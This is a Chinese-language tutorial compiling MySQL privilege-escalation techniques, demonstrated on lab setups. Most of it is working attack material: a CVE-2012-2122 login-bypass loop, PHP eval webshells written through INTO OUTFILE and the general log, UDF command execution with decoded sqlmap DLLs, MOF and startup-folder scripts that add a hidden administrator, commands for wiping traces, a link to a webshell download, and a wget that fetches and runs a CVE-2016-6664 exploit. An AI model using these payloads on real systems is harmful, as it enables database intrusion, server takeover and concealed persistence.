MySQL提權總結（建議收藏）

前言

數據庫權限

在平常的滲透提權中，我們通常可以在一些特殊情況下得到數據庫的用戶名和密碼（最高權限root），如下：

MySQL 3306 端口弱口令爆破
sqlmap 注入的 --sql-shell 模式 網站的數據庫配置文件中拿到明文密碼信息 CVE-2012-2122 等這類漏洞直接拿下 MySQL 權限

口令爆破、sqlmap的--sql-shell模式和數據庫配置文件中拿明文密碼已經老生常談了，這里主要演示一下CVE-2012-2122

CVE-2012-2122

當連接MariaDB/MySQL時，輸入的密碼會與期望的正確密碼比較，由於不正確的處理，會導致即便是memcmp()返回一個非零值，也會使MySQL認為兩個密碼是相同的。 也就是說只要知道用戶名，不斷嘗試就能夠直接登入SQL數據庫。按照公告說法大約256次就能夠蒙對一次。

#受影響版本

MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not.

MySQL versions from 5.1.63, 5.5.24, 5.6.6 are not.

在vunlub中啟動CVE-2012-2122環境

 

 環境啟動后用docker ps查看進程

 

 可以看到啟動了一個Mysql服務（版本：5.5.23），監聽端口為3306端口，默認的root用戶的密碼為123456

我們可以使用mysql客戶端進行遠程連接數據庫

 連接測試就證明我們的環境正常搭建。然后就是漏洞利用了，正常模擬攻擊者，我們是沒有密碼，不知道root的密碼為123456的，這個時候我們就可以利用CVE-2012-2122來進行身份繞過

msf可以導出hash值

msf6 > use auxiliary/scanner/mysql/mysql_authbypass_hashdump
msf6 > set rhosts 192.168.178.128 msf6 > run

或者直接bash輸入

root@root:~/桌面# for i in `seq 1 1000`; do mysql -u root --password=bad -h 192.168.178.128 2>/dev/null; done
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MySQL connection id is 854 Server version: 5.5.23 Source distribution Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others. Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. MySQL [(none)]> 

MySQL提權

Webshell權限

into oufile 寫 shell

into oufile 寫 shell要滿足如下條件才可以寫入

1、知道網站物理路徑
2、高權限數據庫用戶 3、load_file() 開啟 即 secure_file_priv 無限制 4、網站路徑有寫入權限

 數據庫查看是否有secure_file_priv限制

mysql> show global variables like '%secure_file_priv%';
+------------------+-------+
| Variable_name    | Value |
+------------------+-------+
| secure_file_priv | NULL  |
+------------------+-------+

Value	說明
NULL	不允許導入或導出
/	只允許在 / 目錄導入導出
空	不限制目錄

在 MySQL 5.5 之前 secure_file_priv 默認是空，這個情況下可以向任意絕對路徑寫文件

在 MySQL 5.5之后 secure_file_priv 默認是 NULL，這個情況下不可以寫文件

利用phpmyadmin來into outfile

首先在存在phpmyadmin時，我們可以試試弱口令，root、root來進行登錄phpmyadmin后台。登錄進去后我們獲取網站的絕對路徑來進行寫shell

在phpmyadmin中，我們可以利用log變量來猜測網站的絕對路徑

 

 

 這里是用phpstudy搭建的網站，所以猜測網站目錄在WWW目錄下，或者通過其他手段的信息收集，來收集到我們的網站絕對路徑。

有了網站路徑，我們就可以執行SQL命令來進行寫shell

  寫入失敗，這里失敗的原因是因為我們前面查詢secure_file_priv值為null，所以權限就是不允許導入或導出，這里我們對secure_file_priv進行修改為空后，再進行寫入。

因為secure_file_priv為只讀權限，所以我們打開my.ini文件，加入如下語句再重啟服務器。

secure_file_priv=''

這時查看權限為所有目錄下可寫入

 

 

 再次寫入shell，會發現成功寫入。

 

 

 然后菜刀、蟻劍進行連接。

 

 

 當然我么還可以利用sqlmap進行文件的寫入，如下：

sqlmap -u "http://x.x.x.x/?id=x" --file-write="c:/Users/suifeng/Desktop/shell.php" --file-dest="C:/phpstudy_pro/WWW/shell.php"

 當然這種寫shell的方式，在MySQL 5.5之后已經很難實現了，因為MySQL 5.5之后值為NULL，在secure_file_priv沒有導入導出權限的時候，我們還可以利用日志寫shell。

利用日志寫shell

在MySQL 5.0 版本以上會創建日志文件，我們可以通過修改日志的全局變量中的存儲位置來 getshell

mysql> SHOW VARIABLES LIKE '%general%';
+------------------+-----------------------------------------------------------------+
| Variable_name    | Value                                                           |
+------------------+-----------------------------------------------------------------+
| general_log      | OFF                                                             |
| general_log_file | C:\phpstudy_pro\Extensions\MySQL5.7.26\data\DESKTOP-1G2NI5V.log |
+------------------+-----------------------------------------------------------------+

general_log 默認關閉，高權限的用戶可以直接通過mysql命令行進行開啟，開啟后日志文件記錄用戶的每條指令，將其保存在general_log _file中。我們可以通過開啟general_log ，然后自定義general_log _file來進行getshell。

mysql> set global general_log = "ON";   #開啟general_log
mysql> set global general_log_file='c:/phpstudy_pro/www/shell.php';   #修改general_log_file路徑

再次查看權限

 

#寫入shell
mysql> select "<?php @eval($_POST['suifeng']);?>"; +-----------------------------------+ | <?php @eval($_POST['suifeng']);?> | +-----------------------------------+ | <?php @eval($_POST['suifeng']);?> | +-----------------------------------+

然后蟻劍連接

 

服務器權限

UDF提權

什么是UDF

UDF(user-defined function)是MySQL的一個拓展接口，也可稱之為用戶自定義函數，它是用來拓展MySQL的技術手段，可以說是數據庫功能的一種擴展，用戶通過自定義函數來實現在MySQL中無法方便實現的功能，其添加的新函數都可以在SQL語句中調用，就像調用一些系統函數如version()函數便捷。

動態鏈接庫

提權大致方法是把我們的動態鏈接庫放置在特點的目錄下，創建我們自定義函數，實現系統函數命令的調用，最終導致提權。

在mysql<5.1  導出目錄c:/windows或system32

在mysql>=5.1  導出安裝目錄/lib/plugin/

在有注入點時候，我們可以通過sqlmap中里的UDF動態鏈接庫進行導入

#sqlmap中動態鏈接庫位置
D:\tools\sqlmap\data\udf\mysql

里面有windows和linux且64位和32位版本，大家可以根據被攻擊器來進行選擇

 

sqlmap中的動態鏈接庫為了防止被殺毒軟件查殺，都經過了編碼處理，不能直接使用，所以我們還需要用sqlmap自帶的解碼工具clock.py進行解碼

#cloak位置
D:\tools\sqlmap\extra\cloak
#解碼操作
D:\tools\sqlmap\extra\cloak>python cloak.py -d -i d:\tools\sqlmap\data\udf\mysql\windows\64\lib_mysqludf_sys.dll_ -o lib_mysqludf_sys_64.dll  #windows解碼

D:\tools\sqlmap\extra\cloak>python cloak.py -d -i d:\tools\sqlmap\data\udf\mysql\linux\64\lib_mysqludf_sys.so_ -o lib_mysqludf_sys_64.so  #linux解碼

動態鏈接庫上傳位置

在上傳動態鏈接庫之前，我們要先對mysql的版本進行判斷

#判斷數據庫版本
mysql> select version(); +-----------+ | version() | +-----------+ | 5.7.26 | +-----------+

這里被攻擊的靶機版本為5.7.26，所以我們要把動態鏈接庫上傳到安裝目錄/lib/plugin/下面，那我們可以利用如下命令查找安裝目錄

mysql> show variables like '%plugin%';
+-------------------------------+----------------------------------------------------+
| Variable_name                 | Value                                              |
+-------------------------------+----------------------------------------------------+
| default_authentication_plugin | mysql_native_password                              |
| plugin_dir                    | C:\phpstudy_pro\Extensions\MySQL5.7.26\lib\plugin\ |
+-------------------------------+----------------------------------------------------+

mysql> select @@basedir;
+-----------------------------------------+
| @@basedir |
+-----------------------------------------+
| C:\phpstudy_pro\Extensions\MySQL5.7.26\ |
+-----------------------------------------+

 

來到對應的目錄下並沒有發現/lib/plugin，所以我們需要自己創建一個/lib/plugin，但是真實環境下我們服務器權限還沒有拿下（這里用是為了觀察直觀），所以我們可以在webshell環境下或者通過NTFS ADS流創建文件夾。

#NTFS ADS流創建語句
mysql> select 'x' into dumpfile 'C:/phpstudy_pro/Extensions/MySQL5.7.26/lib/plugin::$INDEX_ALLOCATION';  #創建不一定成功，不成功的情況下還是利用webshell的權限創建目錄

 

創建好后我們就可以導入我們的動態鏈接庫了。

導入動態鏈接庫

存在sql注入時

在存在sql注入的時候，我們可以通過sqlmap來上傳動態鏈接庫，但是需要滿足的條件為secure_file_priv的值為空，sql注入為最高權限，又因為 GET 有字節長度限制，所以往往 POST 注入才可以執行這種攻擊。

python sqlmap.py -u "http://192.168.178.130/sqli-labs/Less-1/?id=1" --file-write="d:/tools/sqlmap/extra/cloak/lib_mysqludf_sys_64.dll" --file-dest="C:/phpstudy_pro/Extensions/MySQL5.7.26/lib/plugin/lib_mysqludf_sys_64.dll"

 不存在sql注入時

沒有sql注入時，我們可以通過執行sql語句來進行寫入動態鏈接庫，這里需要寫入文件，所以需要secure_file_priv為空。

#select后面為動態鏈接庫的十六進制編碼（數據太長，這里省略顯示）
SELECT 0x4d5a900003... INTO DUMPFILE 'C:/phpstudy_pro/Extensions/MySQL5.7.26/lib/plugin/lib_mysqludf_sys_64.dll';  

動態鏈接庫的十六進制可以通過mysql自帶的hex函數或者一些文件十六進制編碼器工具解決。當然在sql語句寫不進去的動態鏈接庫的時候，我們還可以通過我們的webshell來進行上傳。

文件上傳完成后

 

 我們就可以通過sql語句來自定義函數了

#原本執行代碼
CREATE FUNCTION sys_eval RETURNS STRING SONAME 'lib_mysqludf_sys_64.dll';
#修改后執行代碼
CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.dll';

本來應該執行這條命令來自定義命令的，但是一直報錯，后來我把dll文件名字修改之后，創建成功。（可能是下划線導致函數在編譯情況下出問題）

#查詢自定義函數
mysql> select * from mysql.func;
+----------+-----+---------+----------+
| name     | ret | dl      | type     |
+----------+-----+---------+----------+
| sys_eval |   0 | udf.dll | function |
+----------+-----+---------+----------+

#創建成功后，我們利用自定義函數進行命令執行
mysql > select sys_eval('whoami');

然后用我們這個自定義命令執行函數進行提權即可。最后為了權限維持，防止被發現，我們可以對自定義函數進行刪除。

#刪除自定義函數
mysql> drop function sys_eval;

這種手工UDF提權無疑太過繁瑣，這里主要推薦通過網頁版一鍵提權腳本，這里使用的是月師傅的馬，下面是下載地址

鏈接：https://pan.baidu.com/s/1a5ASE2TLvnKsOUxsHKBjOw 
提取碼：v9s9

上傳后訪問

然后再導入，執行命令即可

 

 

 

MOF提權

現在通過mof文件來進行提權已經非常困難了，因為它支持提權版本只有2003和一些之前的版本。mof的提權原理為mof文件每五秒就會執行，而且是系統權限，我們通過mysql使用load_file 將文件寫入/wbme/mof，然后系統每隔五秒就會執行一次我們上傳的MOF。MOF當中有一段是vbs腳本，我們可以通過控制這段vbs腳本的內容讓系統執行命令，進行提權。

mof腳本如下

#pragma namespace("\\\\.\\root\\subscription") 

instance of __EventFilter as $EventFilter 
{ 
    EventNamespace = "Root\\Cimv2"; 
    Name  = "filtP2"; 
    Query = "Select * From __InstanceModificationEvent " 
            "Where TargetInstance Isa \"Win32_LocalTime\" " 
            "And TargetInstance.Second = 5"; 
    QueryLanguage = "WQL"; 
}; 

instance of ActiveScriptEventConsumer as $Consumer 
{ 
    Name = "consPCSV2"; 
    ScriptingEngine = "JScript"; 
    ScriptText = 
"var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user suifeng p@ssw0rd /add\")\nWSH.run(\"net.exe localgroup administrators suifeng /add\")";   #創建用戶
}; 

instance of __FilterToConsumerBinding 
{ 
    Consumer   = $Consumer; 
    Filter = $EventFilter; 
};

首先我們將我們的腳本上傳，然后用如下命令上傳到指定目錄。

select load_file("C:/Documents and Settings/suifeng.mof") into dumpfile "c:/windows/system32/wbem/mof/suifeng.mof";

然后等待五秒后用net user命令可以看到創建的用戶

mof提權痕跡清理

因為每隔幾秒鍾時間又會重新執行添加用戶的命令，所以想要清理痕跡得先暫時關閉 winmgmt 服務再刪除相關 mof 文件

#停止winmgmt服務
net stop winmgmt
#刪除Repository文件夾
rmdir /s /q C:\Windows\system32\wbem\Repository\ #重新啟動服務 net start winmgmt

啟動項提權

MySQL的啟動項提權，原理就是通過mysql把一段vbs腳本導入到系統的啟動項下，如果管理員啟動或者重啟的服務器，那么該腳本就會被調用，並執行vbs腳本里面的命令。

以下是啟動項路徑

#2003
C:\Documents and Settings\Administrator\Start Menu\Programs\Startup
C:\Documents and Settings\All Users\Start Menu\Programs\Startup
#2008 C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup

有了路徑我們在mysql的shell下輸入如下代碼

create table a (cmd text); 
insert into a values ("set wshshell=createobject (""wscript.shell"") " ); insert into a values ("a=wshshell.run (""cmd.exe /c net user suifeng p@ssw0rd /add"",0) " ); insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators suifeng /add"",0) " ); select * from a into outfile "C:\\Documents and Settings\\All Users\\「開始」菜單\\程序\\啟動\\a.vbs";

 

 然后我們在對應路徑下就可以看到我們的vbs腳本了

 

然后重啟，即可發現vbs腳本里面創建的用戶。

CVE-2016-6663、CVE-2016-6664組合提權

在一些Mysql小於5.5.51或小於5.6.32或小於5.7.14及衍生版本，我們都可以利用CVE-2016-6663、CVE-2016-6664組合對其進行測試提權。

1、利用CVE-2016-6663將www-data權限提升為mysql權限：

cd /var/www/html/
gcc mysql-privesc-race.c -o mysql-privesc-race -I/usr/include/mysql -lmysqlclient
./mysql-privesc-race test 123456 localhost testdb

2、利用CVE-2016-6664將Mysql權限提升為root權限：

wget http://legalhackers.com/exploits/CVE-2016-6664/mysql-chowned.sh
chmod 777 mysql-chowned.sh
./mysql-chowned.sh /var/log/mysql/error.log